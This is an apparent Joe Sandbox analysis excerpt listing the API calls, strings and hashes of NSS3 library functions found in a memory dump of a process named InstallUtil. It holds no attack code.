                                                                                                                  • API String ID: 759471828-0
                                                                                                                  • Opcode ID: 0bac892a0187a1ad36aef6d2f4bfb15c856b6b78ddd6aead538d82ab7807fc3f
                                                                                                                  • Instruction ID: 306c74baf041c0e133f6fc3af4265fed6b02e7b73bdeecdea093fa456c404dfe
                                                                                                                  • Opcode Fuzzy Hash: 0bac892a0187a1ad36aef6d2f4bfb15c856b6b78ddd6aead538d82ab7807fc3f
                                                                                                                  • Instruction Fuzzy Hash: EFB12175A002069FDF11EF68E989BAA77B8BF0A318F044134ED2597B11E731E961CBD1
                                                                                                                  APIs
                                                                                                                  • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C7E6BF7), ref: 6C7E6EB6
                                                                                                                    • Part of subcall function 6C741240: TlsGetValue.KERNEL32(00000040,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741267
                                                                                                                    • Part of subcall function 6C741240: EnterCriticalSection.KERNEL32(?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C74127C
                                                                                                                    • Part of subcall function 6C741240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741291
                                                                                                                    • Part of subcall function 6C741240: PR_Unlock.NSS3(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C7412A0
                                                                                                                  • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C88FC0A,6C7E6BF7), ref: 6C7E6ECD
                                                                                                                  • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7E6EE0
                                                                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C7E6EFC
                                                                                                                  • PR_NewLock.NSS3 ref: 6C7E6F04
                                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7E6F18
                                                                                                                  • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C7E6BF7), ref: 6C7E6F30
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C7E6BF7), ref: 6C7E6F54
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C7E6BF7), ref: 6C7E6FE0
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C7E6BF7), ref: 6C7E6FFD
                                                                                                                  Strings
                                                                                                                  • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C7E6FF8
                                                                                                                  • SSLKEYLOGFILE, xrefs: 6C7E6EB1
                                                                                                                  • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C7E6F4F
                                                                                                                  • SSLFORCELOCKS, xrefs: 6C7E6F2B
                                                                                                                  • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C7E6FDB
                                                                                                                  • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C7E6EF7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                  • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                  • API String ID: 412497378-2352201381
                                                                                                                  • Opcode ID: dea568d207fa32060883fa9b6d8f5ad6ca48d773f4d053348f3fc0d61c07a3cb
                                                                                                                  • Instruction ID: e4873896923370f1f1e7053965d81d241e22585e186c01b48d9b896b4d492cfa
                                                                                                                  • Opcode Fuzzy Hash: dea568d207fa32060883fa9b6d8f5ad6ca48d773f4d053348f3fc0d61c07a3cb
                                                                                                                  • Instruction Fuzzy Hash: CBA105B3B599C587E760463CCF0138833A6AB9B32EF588775E931C6ED6DB35A440C285
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75C4D5
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C75C516
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C75C530
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75C54E
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C75C5CB
                                                                                                                  • VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C75C712
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C75C725
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C75C742
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C75C751
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C75C77A
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C75C78F
                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C75C7A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 1085474831-3315324353
                                                                                                                  • Opcode ID: 6610db7c2c6e6d71650a88f546bc2da8bfd840dcdaf7979386786ad60dc459cc
                                                                                                                  • Instruction ID: cb29b9e4c9e041c97288ab22bf5dbf5edb6ee3f690e67cbe6497a89d79e2aa92
                                                                                                                  • Opcode Fuzzy Hash: 6610db7c2c6e6d71650a88f546bc2da8bfd840dcdaf7979386786ad60dc459cc
                                                                                                                  • Instruction Fuzzy Hash: 60810B71C001089BEF00EAA5DE88BEE7774DF0930EFA44535E905A6E91EB31DA69C791
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(6C7C3803,?,6C7C3817,00000000), ref: 6C7C450E
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,6C7C3817,00000000), ref: 6C7C4550
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C7C45B5
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C7C4709
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C7C4727
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C7C473B
                                                                                                                  • PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C7C4801
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C882DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C7C482E
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C7C48F3
                                                                                                                  • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7C4923
                                                                                                                  • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7C4937
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C7C494E
                                                                                                                  • PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C7C4963
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7C4984
                                                                                                                  • VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C7C21C2,?,?,?), ref: 6C7C499C
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7C49B5
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C7C49C5
                                                                                                                  • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7C49DC
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7C49E9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3698863438-0
                                                                                                                  • Opcode ID: 793a139229f35474724d553e3c211a7f04033f05d07160aeaf25e527b00dcfb7
                                                                                                                  • Instruction ID: 479623c5fda126dcf24037c54585f6bdb254fd6053a41fcac408af05c1b4282f
                                                                                                                  • Opcode Fuzzy Hash: 793a139229f35474724d553e3c211a7f04033f05d07160aeaf25e527b00dcfb7
                                                                                                                  • Instruction Fuzzy Hash: C7A103B1F01216AFEF108A65EE84BBE3A75AB0531CF244134ED05A7B81E731D945DBA3
                                                                                                                  APIs
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000001C,?,6C7BE853,?,FFFFFFFF,?,?,6C7BB0CC,?,6C7BB4A0,?,00000000), ref: 6C7BE8D9
                                                                                                                    • Part of subcall function 6C7B0D30: calloc.MOZGLUE ref: 6C7B0D50
                                                                                                                    • Part of subcall function 6C7B0D30: TlsGetValue.KERNEL32 ref: 6C7B0D6D
                                                                                                                    • Part of subcall function 6C7BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7BDAE2,?), ref: 6C7BC6C2
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C7BE972
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C7BE9C2
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BEA00
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7BEA3F
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7BEA5A
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7BEA81
                                                                                                                  • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C7BEA9E
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7BEACF
                                                                                                                  • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C7BEB56
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7BEBC2
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C7BEBEC
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7BEC58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                                  • String ID: S{l
                                                                                                                  • API String ID: 759478663-2432972085
                                                                                                                  • Opcode ID: dcc8ef42f80c89b6ba97677c1c968eb9dd126f7b29df0ba0f4786d9fbbd653d8
                                                                                                                  • Instruction ID: 223aefb4ce80334f25f0942e369416c0f823f86ee018b8b27fa90f6a2d2153d2
                                                                                                                  • Opcode Fuzzy Hash: dcc8ef42f80c89b6ba97677c1c968eb9dd126f7b29df0ba0f4786d9fbbd653d8
                                                                                                                  • Instruction Fuzzy Hash: E0C16FB5E012099FEB00CF69DA85BAA77B4BF08318F1405B9E916B7B51E731E804CBD1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7E5B56
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E290A
                                                                                                                  • EnterCriticalSection.KERNEL32(00000001), ref: 6C7E291E
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E2937
                                                                                                                  • EnterCriticalSection.KERNEL32(00000001), ref: 6C7E294B
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2966
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E29AC
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E29D1
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E29F0
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2A15
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2A37
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2A61
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2A78
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2A8F
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2AA6
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C81945B
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C819479
                                                                                                                    • Part of subcall function 6C819440: EnterCriticalSection.KERNEL32 ref: 6C819495
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C8194E4
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C819532
                                                                                                                    • Part of subcall function 6C819440: LeaveCriticalSection.KERNEL32 ref: 6C81955D
                                                                                                                  • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C7E2AF9
                                                                                                                  • free.MOZGLUE(?), ref: 6C7E2B16
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7E2B6D
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7E2B80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2841089016-0
                                                                                                                  • Opcode ID: b6cbafaec7ea58b5208554d66aa5708511254f7ff40795c14ce795059de1f6d0
                                                                                                                  • Instruction ID: 9a4fa4c6500af2dabe44dfd707ddff66fb06d8dc02c82eb1a63f07a01b89b81a
                                                                                                                  • Opcode Fuzzy Hash: b6cbafaec7ea58b5208554d66aa5708511254f7ff40795c14ce795059de1f6d0
                                                                                                                  • Instruction Fuzzy Hash: 6181B6B2A007025BDB209F39ED49797B7E5AF15318F044938D85AC7B11EB32E519CB91
                                                                                                                  APIs
                                                                                                                  • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8E7B
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8E9E
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(6C8B0B64,00000001,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8EAD
                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8EC3
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8ED8
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8EE5
                                                                                                                  • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C7A8E01), ref: 6C7A8EFB
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C8B0B64,6C8B0B64), ref: 6C7A8F11
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C7A8F3F
                                                                                                                    • Part of subcall function 6C7AA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C7AA421,00000000,00000000,6C7A9826), ref: 6C7AA136
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7A904A
                                                                                                                  Strings
                                                                                                                  • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C7A8E76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                  • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                  • API String ID: 977052965-1032500510
                                                                                                                  • Opcode ID: 70bce0702ada8a701bc11eeab141e983620c5bb81f689b4d391e2cb6422ae779
                                                                                                                  • Instruction ID: 2b50797d879ed74552bde2c9d270f8ea5acc6c2aa017e7f7dcc2670f759cbc0a
                                                                                                                  • Opcode Fuzzy Hash: 70bce0702ada8a701bc11eeab141e983620c5bb81f689b4d391e2cb6422ae779
                                                                                                                  • Instruction Fuzzy Hash: D46195B5D00106AFDB10CF96CE44AABB7B5FF95358F144638DC18A7700E732A916CBA0
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C758E5B
                                                                                                                  • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C758E81
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C758EED
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8818D0,?), ref: 6C758F03
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C758F19
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C758F2B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C758F53
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C758F65
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C758FA1
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C758FFE
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C759012
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C759024
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C75902C
                                                                                                                  • PORT_DestroyCheapArena.NSS3(?), ref: 6C75903E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3512696800-3315324353
                                                                                                                  APIs
                                                                                                                  • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C81CC7B), ref: 6C81CD7A
                                                                                                                    • Part of subcall function 6C81CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C78C1A8,?), ref: 6C81CE92
                                                                                                                  • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C81CDA5
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C81CDB8
                                                                                                                  • PR_UnloadLibrary.NSS3(00000000), ref: 6C81CDDB
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C81CD8E
                                                                                                                    • Part of subcall function 6C7405C0: PR_EnterMonitor.NSS3 ref: 6C7405D1
                                                                                                                    • Part of subcall function 6C7405C0: PR_ExitMonitor.NSS3 ref: 6C7405EA
                                                                                                                  • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C81CDE8
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C81CDFF
                                                                                                                  • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C81CE16
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C81CE29
                                                                                                                  • PR_UnloadLibrary.NSS3(00000000), ref: 6C81CE48
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                  • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                  • API String ID: 601260978-871931242
                                                                                                                  APIs
                                                                                                                  • PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C794590
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79471C
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79477C
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79479A
                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C79484A
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C794858
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79486A
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79487E
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C79488C
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79489C
                                                                                                                  • PK11_GetInternalSlot.NSS3 ref: 6C7948B2
                                                                                                                  • PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C777F9D), ref: 6C7948EC
                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C79492A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C794949
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C794977
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C794987
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79499B
                                                                                                                  Similarity
                                                                                                                  • API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1673584487-0
                                                                                                                  APIs
